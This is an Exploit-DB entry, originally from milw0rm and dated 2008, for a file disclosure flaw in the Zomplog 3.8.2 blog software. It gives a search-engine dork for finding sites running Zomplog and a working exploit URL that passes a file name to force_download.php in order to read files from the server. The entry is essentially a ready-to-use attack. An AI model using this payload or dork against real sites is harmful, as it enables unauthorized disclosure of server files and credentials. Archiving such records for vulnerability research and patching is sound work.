Zomplog 3.8.2 - 'force_download.php' File Disclosure

EDB-ID:

5636

CVE:

N/A

Author:

Stack

Type:

webapps

Platform:

PHP

Published:

2008-05-16

Name:  "Zomplog 3.8.2 <= file disclouse"
Version: All
Script Download: http://www.zomp.nl/zomplog/
DORK: "powered by zomplog"
Discovered By: Stack-Terrorist

Exploit:
http://localhost/path/upload/force_download.php?file=force_download.php
 
thnx : alah 

# milw0rm.com [2008-05-16]